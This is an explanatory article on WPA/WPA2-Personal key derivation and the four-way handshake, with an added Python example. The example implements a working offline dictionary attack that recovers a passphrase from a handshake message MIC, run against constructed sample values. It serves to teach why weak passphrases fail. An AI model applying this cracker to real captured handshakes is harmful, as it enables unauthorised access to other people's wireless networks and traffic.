Think Wi-Fi Protected Access makes your home or small business network impenetrable? Think again - and learn how to protect yourself.

Wi-Fi Protected Access (WPA) protects wireless data by applying encryption, integrity checks, and sequencing. The first version of WPA patched around mistakes in the old, broken Wired Equivalent Privacy (WEP), while WPA2 started from a clean slate to deliver more robust, efficient security.

Either version of WPA can stop wireless eavesdropping - with one big caveat. The encryption keys upon which they depend must never be disclosed to outsiders.

WPA and WPA2 are best when used with 802.1X Port Access Control for per-user authentication and per-session key delivery. Known as WPA-Enterprise or WPA2-Enterprise, this approach was designed for business networks with the staff and resources required to support RADIUS-based authentication. Every new session gets its own fresh random key, used for a relatively short time. While that doesn't make key cracking completely impossible, it substantially reduces the risk.

Since home networks don't generally have RADIUS servers, a simpler option also exists: Pre-Shared Keys (PSKs). Known as WPA-PSK, WPA-Personal or WPA2-Personal, this approach authenticates everyone using the WLAN with the same secret passphrase, configured into the Access Point (AP). But, unlike those old WEP keys, PSKs are not encryption keys - they are the starting point for deriving per-station (client) encryption keys. (For how to set up WPA at home, see WPA-PSK: Step-by-Step.)

Unfortunately, the way in which WPA/WPA2 encryption keys are generated and delivered makes it easy for an attacker to try to guess your WLAN's PSK offline. Once an outsider has the PSK, they can steal service and, after capturing a legitimate station's handshake, decrypt data sent by that station on your network.

Let's Shake on It

A PSK is a 256-bit value, known to every device in the WLAN. If you have ever used Windows XP to connect to a WPA-Personal WLAN, you have been prompted to enter a WPA passphrase. That PSK is usually generated from the passphrase (an ASCII string of 8 to 63 characters) and the WLAN's name (Service Set Identifier, SSID), which is used as the salt in 4,096 iterations of PBKDF2 with HMAC-SHA1. The iteration count slows down each guess, but it does not stop an attacker from trying a dictionary of likely passphrases.

When using WPA or WPA2, every station is permitted to associate with the AP. The AP or station has the option to start 802.1X authentication, exchanging Extensible Authentication Protocol (EAP) messages to verify user/server identities. After authentication (if any), the AP kicks off a four-way handshake (see figure below) to derive the keys for this session. The handshake must be completed before any encrypted data can actually be exchanged between this station and AP. What is actually happening during this handshake?

- The AP and each station need an individual Pairwise Transient Key (PTK) to protect unicast communication between them. To derive a different PTK for each AP/station combination, a Pairwise Master Key (PMK) is fed into a pseudo-random function along with both MAC addresses (AP and station) and two random values: ANonce, chosen by the AP, and SNonce, chosen by the station. Messages #1 and #2 in the figure carry ANonce and SNonce in the clear; they show how the AP and station manage to derive the same PTK without ever sending it over the air.

- The AP also generates a Group Temporal Key (GTK) to protect all broadcast and multicast communication. Because every station on the WLAN needs that same GTK to decrypt broadcast/multicast frames, the AP sends the current GTK in message #3 of the handshake. To prevent eavesdropping, the GTK is encrypted with the key-encryption portion of the PTK.

- To stop these handshake messages from being forged, messages #2 through #4 carry a Message Integrity Code (MIC). Each MIC is a keyed hash (HMAC) computed over the EAPOL-Key frame with the Key Confirmation Key, the first 128 bits of the PTK. The MIC therefore depends on the PTK, and every input to the PTK other than the PMK is visible on the air.

This four-way handshake occurs whenever you connect to a WLAN using WPA or WPA2. It also occurs periodically thereafter, whenever the AP decides to refresh transient keys. End users may not be aware of this handshake - and administrators may not really care about all of these gory details.

But WPA PSK crackers do.

In WLANs that use WPA-Enterprise or WPA2-Enterprise, every session starts from a different PMK, derived from the EAP exchange and delivered to the AP by the RADIUS server during 802.1X authentication. However, in WLANs using WPA-Personal or WPA2-Personal, there's no 802.1X, so the station and AP must use a value they both already know. What value do they both know? The PSK, of course.
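The chain that a PSK cracker reproduces for every guess (passphrase and SSID to PSK via PBKDF2, PSK and the handshake's public values to PTK, the PTK's Key Confirmation Key to the message #2 MIC) is shown below as an added Python example; it is not code from the original article. The SSID, MAC addresses, nonces, passphrase, wordlist and the "captured" EAPOL-Key frame are all constructed here for the demonstration; the derivation functions follow IEEE 802.11i (WPA2-Personal with CCMP, key descriptor version 2), and the passphrase/SSID pair "password"/"IEEE" is the standard's published PBKDF2 test vector.

```python
import hashlib
import hmac

# --- Key derivation as specified by IEEE 802.11i (WPA2-Personal, CCMP) ---

def derive_psk(passphrase: str, ssid: str) -> bytes:
    """PSK = PBKDF2-HMAC-SHA1(passphrase, SSID, 4096 iterations, 256 bits).
    In WPA-Personal the PSK is used directly as the PMK."""
    return hashlib.pbkdf2_hmac("sha1", passphrase.encode(), ssid.encode(), 4096, 32)


def prf(key: bytes, label: bytes, data: bytes, nbytes: int) -> bytes:
    """802.11i PRF-n: concatenate HMAC-SHA1(key, label || 0x00 || data || i) for i = 0, 1, ..."""
    out = b""
    i = 0
    while len(out) < nbytes:
        out += hmac.new(key, label + b"\x00" + data + bytes([i]), hashlib.sha1).digest()
        i += 1
    return out[:nbytes]


def derive_ptk(pmk: bytes, aa: bytes, spa: bytes, anonce: bytes, snonce: bytes) -> bytes:
    """PTK for CCMP (384 bits): KCK (16) || KEK (16) || TK (16).
    MACs and nonces are ordered min/max so AP and station build the same input."""
    data = min(aa, spa) + max(aa, spa) + min(anonce, snonce) + max(anonce, snonce)
    return prf(pmk, b"Pairwise key expansion", data, 48)


# EAPOL-Key frame: 4-byte EAPOL header, then descriptor type(1), key info(2), key length(2),
# replay counter(8), nonce(32), IV(16), RSC(8), key ID(8), MIC(16), key data length(2), key data.
# The MIC field therefore starts at byte offset 81.
MIC_OFFSET = 81


def build_msg2(snonce: bytes, key_data: bytes, mic: bytes = bytes(16)) -> bytes:
    """Constructed handshake message #2 (station -> AP), key descriptor version 2 (HMAC-SHA1-128)."""
    body = (
        b"\x02"                    # descriptor type: RSN
        + b"\x01\x0a"              # key info: version 2, Pairwise, MIC present
        + b"\x00\x00"              # key length (0 in message 2)
        + (1).to_bytes(8, "big")   # replay counter
        + snonce
        + bytes(16) + bytes(8) + bytes(8)   # IV, RSC, key ID (unused in message 2)
        + mic
        + len(key_data).to_bytes(2, "big")
        + key_data
    )
    return b"\x01\x03" + len(body).to_bytes(2, "big") + body


def eapol_mic(kck: bytes, frame: bytes) -> bytes:
    """Version 2 MIC: HMAC-SHA1 over the whole EAPOL frame with the MIC field zeroed, truncated to 128 bits."""
    zeroed = frame[:MIC_OFFSET] + bytes(16) + frame[MIC_OFFSET + 16:]
    return hmac.new(kck, zeroed, hashlib.sha1).digest()[:16]


def check_passphrase(passphrase, ssid, aa, spa, anonce, snonce, frame) -> bool:
    """One cracker iteration: passphrase -> PSK -> PTK -> KCK -> MIC, compared with the captured MIC."""
    ptk = derive_ptk(derive_psk(passphrase, ssid), aa, spa, anonce, snonce)
    kck = ptk[:16]
    return hmac.compare_digest(eapol_mic(kck, frame), frame[MIC_OFFSET:MIC_OFFSET + 16])


# --- Constructed sample "capture": every value below is made up for this example ---
SSID = "HomeNet"
AA = bytes.fromhex("001122334455")      # AP (authenticator) MAC, visible in the frame headers
SPA = bytes.fromhex("66778899aabb")     # station (supplicant) MAC, visible in the frame headers
ANONCE = bytes(range(32))               # sent in the clear in message #1
SNONCE = bytes(range(32, 64))           # sent in the clear in message #2
RSN_IE = bytes.fromhex("30140100000fac040100000fac040100000fac020000")  # CCMP/PSK RSN IE
TRUE_PASSPHRASE = "s3cr3t-passphrase"

# Produce the frame a real station would send: MIC computed with the true KCK.
_ptk = derive_ptk(derive_psk(TRUE_PASSPHRASE, SSID), AA, SPA, ANONCE, SNONCE)
CAPTURED_MSG2 = build_msg2(SNONCE, RSN_IE, eapol_mic(_ptk[:16], build_msg2(SNONCE, RSN_IE)))

WORDLIST = ["password", "HomeNet123", "letmein1", "s3cr3t-passphrase", "qwertyuiop"]


def crack_psk(candidates=WORDLIST):
    """Offline dictionary attack against the captured message #2; returns the passphrase or None.
    Each guess costs 4096 HMAC-SHA1 iterations plus a few more for the PTK and MIC."""
    for guess in candidates:
        if 8 <= len(guess) <= 63 and check_passphrase(guess, SSID, AA, SPA, ANONCE, SNONCE, CAPTURED_MSG2):
            return guess
    return None


if __name__ == "__main__":
    print("PSK for 'password' / 'IEEE':", derive_psk("password", "IEEE").hex())
    print("Recovered passphrase:", crack_psk())
```

Nothing in the attack touches the AP after the capture: the SSID is beaconed, both MAC addresses and both nonces travel in the clear, and the MIC on message #2 is the oracle. The only defence on the passphrase side is entropy, since PBKDF2's 4,096 iterations merely make each guess cost a few thousand hash operations.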